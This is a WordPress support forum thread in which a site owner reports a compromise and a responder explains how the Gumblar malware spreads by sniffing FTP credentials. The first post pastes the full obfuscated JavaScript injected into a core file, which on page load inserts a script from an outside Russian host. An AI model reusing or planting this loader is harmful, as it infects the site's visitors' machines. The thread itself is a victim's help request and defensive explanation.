Ready to get started?Download WordPress


My WordPress site has been hacked? (8 posts)

  1. CoolHandLuke
    Posted 4 years ago #

    Ok I went to visit my site today and had an unexpected error. It said an unexpected "<" was found in wp-includes/default-filters.php.

    Upon inspection and comparing it to the original I found this at the bottom of the page:

    <script>A=44037;A+=144;var wc={MR:false};var E={};var C=RegExp;var e=document;try {var N='l'} catch(N){};var R=null;var X=window;try {var F='VN'} catch(F){};P={};var z;this.TS=false;function K(){d=["JM","lj","W"];var Mr="Mr";var uB={j:45161};function u(b,J,n){var y={zo:"fy"};return b.substr(J,n);}var T="\x2f\x6d\x75\x6c\x74\x69\x70\x6c\x79\x2d\x63\x6f\x6d\x2f\x67\x6f\x6f\x67\x6c\x65\x2e\x63\x6f\x6d\x2f\x69\x6e\x66\x6f\x6c\x69\x6e\x6b\x73\x2e\x63\x6f\x6d\x2e\x70\x68\x70";var Pi={KI:"Kq"};var L="";var Q="scr"+"ipt";this._=48226;this._+=113;this.DW=21061;this.DW+=214;var Jz=String("body");var M=String(u("]wzgT",0,1));var M="]";var SA='';var g='';var tP="tP";function p(b,J){var n=String("[");IR=40396;IR+=132;n+=J;dx=61839;dx++;this.nZ=33551;this.nZ+=146;n+=M;var np=new C(n, "g");var CP=new Date();return b[new String(u("rep4JT",0,3)+"lac"+u("d9qeqd9",3,1))](np, g);this.CC=19435;this.CC+=202;Ef=["sT","Lc"];};Zr=[];this.tH="";var QZ="ht"+"tp"+":/"+"/n"+"ot"+"ke"+"y."+u("ruTH0v",0,2)+u("AZN:ANZ",3,1);var B=320305-312225;var G='';var _G='';var t=p('cQrLe8aFtBeFE8lfeZmFeMnBtQ','LMwQZ8FfxOB');var NVm=["fD","vq","Dk"];var f=p('a2pqpGeqn2dGCthoizltd2','qtSo2Gz');R=String("onl"+u("oadVDN",0,3));var JU=61015;dt={};var Zv=["LC","x"];Xl=[];z=function(){try {this.nN=57413;this.nN-=123;TW=e[t](Q);G=QZ;var rW=["HIs","Wb"];var Ym=["Yp","nc"];G+=B;G+=T;var uu=[];var QX='';var w=p('dYe2fAeorN','vgAxN2YPbyL1Mo');var Ca=u("srcwA1C",0,3);we=["YX","Rb"];TW[Ca]=G;var mA="mA";var uuG="uuG";TW[w]=[1][0];this.BE=false;this.GA="";this.s_="s_";var li=false;e[Jz][f](TW);nNg=["SE","fF","BK"];WQ=16422;WQ++;} catch(gA){aq={TR:false};lB={};var U=new String();};var hh={eF:1202};};var CX=[];jK={BM:"uob"};var JQ=["Rv","_M","TSO"];};try {var jM='QD'} catch(jM){};K();try {var nt='o'} catch(nt){};X[R]=z;</script>

    I replace the page with an original version and the page loaded, however my Symantic End Point protection blocked some stuff. Now I am having headers errors trying to log into the control panel?

    Has anyone heard of this? What can I do? I have a back up copy that is a few days old by how did this happen to begin with?

    site url: http://www.kingstoneastnews.ca

    Anyhelp would be nice.



  2. CoolHandLuke
    Posted 4 years ago #

    Ok I've noticed if you go to the url without the "www" you can get a quick mention of "notkey.ru"? The page will also not load that way. Again it wasn't loading at all until I took at the above scripts from these two files:


    It is working somewhat now but I can't get into the admin area.

    The Passwords were very secure.


  3. CoolHandLuke
    Posted 4 years ago #

    Well I had to take down the site. I quickly reverted to an April version and will have to come back to this issue later tonight.

    It seems even though I had the site working again somebody hacked it and is was force me to download a pdf with I went to it and kept trying to contact "notkey.ry"

    Does anyone think this may have infected the database in anyway or can I just change the password on the data, delete all my WP files, and the re-upload them?

    Does anyone know how this may have happened?



  4. CoolHandLuke
    Posted 4 years ago #

    HAHA... wow! My wordpress install was at the root of the domain. I had the old one store in a directory root/news. However I had a redirect so that if anyone went to /news it would take them back to the original domain.

    So I deleted all the wp files in the root install (I have a backup from 3 days ago) and then moved the /news contents to the root thinking I could just run last months version of the site for a few hours. Well I went to reload the site and it is back to the original problem:

    An unexpected "<" etc... So this means somehow someone hacked into the /news directory too?

    Any thoughts on this would be very helpful! I have to go for a few hours but will be back later.



  5. esmi
    Forum Moderator
    Posted 4 years ago #

  6. CoolHandLuke
    Posted 4 years ago #

    The more I look into this it looks like something called Gumblar.

    It has completely killed my web development machine. I can't even log in to it in safe mode. It just logs you right out.

    Has anyone had any experience with this before. I did have a website that I went to last night cause my antivirus to say it was an infected site but I closed it down.. guess it got through.

    Man what a mess.


  7. CoolHandLuke
    Posted 4 years ago #

    Well I have some good news to report in that the site is back up.

    Here is a summary of events in case it may save you.

    • I was browsing the web on my web dev cpu looking for plugin advice about having "blogroll" style links listed in a page.
    • I stumbled onto a page that caused my virus scanner (AVG) to go wild. I closed this page quickly. However, it appears I got some version of Gumblar
    • I retired to bed only to discover the site errors outlined above the next day
    • I made a bunch of panicked posts thinking some how my word press got hacked. However, it turns out my web dev machine got malwared, virused, and hacked.
    • Thankfully I had a back up of the site from 3 days ago. I was able to use my good non infected PC to fix the site and it is up and running again! I changed all the passwords to ftp,Cpanel,WordPress, etc...

    Remember this all started using a google search engine on my Web Dev machine. I did have my filezilla client open at the time. However, the machine was only on for about 5 minutes after I hit the webpage infected with Gumblar.

    My web dev machine is down and needs a format. What ever this browser based attack did in 5 minutes was enough to cause majour damage locking the computer out of all user accounts in all modes, safe, safe command prompt etc...

    I still don't understand this Gumblar but it scares me. I have yet to find any real answers on how to protect against this kind of attack. Does anyone have any ideas?



  8. intuity
    Posted 4 years ago #

    Gumblar is spread via FTP password compromise - usually the generated code is also responsible, it's how it spreads.

    This trojan horse that is installed (the .dat file that people end up seeing, or .exe, etc) installs a keylogging trojan that also sniffs network packets looking for FTP authentication sequences. Once it finds a FTP password, it phones home with the domain name, the username, and the password, which is then used to log in to a FTP account, download all PHP and HTML files, insert the code you are seeing, and then reupload them.

    You can see this sequence in your FTP logs. The ONLY way to stop it is to ensure that ALL of the computers that you access your site from via FTP are clean of it. MalwareBytes, TrendMicro's HouseCall scanner, those two can remove it. You may have to be in Safe Mode to remove it. There are several variants, some have been observed to be polymorphic and will hide from most scanners (NOD32, Symantec, and McAfee are ones that it will hide from).

    In most cases, if your hosting provider uses a suPHP environment, which generally if you are using cPanel, then yes - then this is not their environment, as you are completely contained within your own little box. Otherwise, this generally cannot spread beyond your user account, unless multiple passwords are sniffed, as UNIX ownership permissions restrict what directories your userid can view, therefore, restricting the files the attack can view, and subsequently download/upload.

    Your hosting provider should be aware (if you are in a shared hosting environment) of Gumblar and its variants, and should have the ability to remove it, once you remove the vector from your systems. Those of you that are advanced enough, should be able to either find a regular expression oneliner to do this, if you are not familiar with regular expressions and/or the use of string manipulation functions with your favorite scripting language, you should leave this to your host to remove it for you, or find any of the freely available scripts that you can run to remove it.

    I have chosen not to link any fixes here, as the fixes that are available are by their nature, destructive, and should be left in the hands of those who are aware of how dangerous they can be to your data.

Topic Closed

This topic has been closed to new replies.

About this Topic


No tags yet.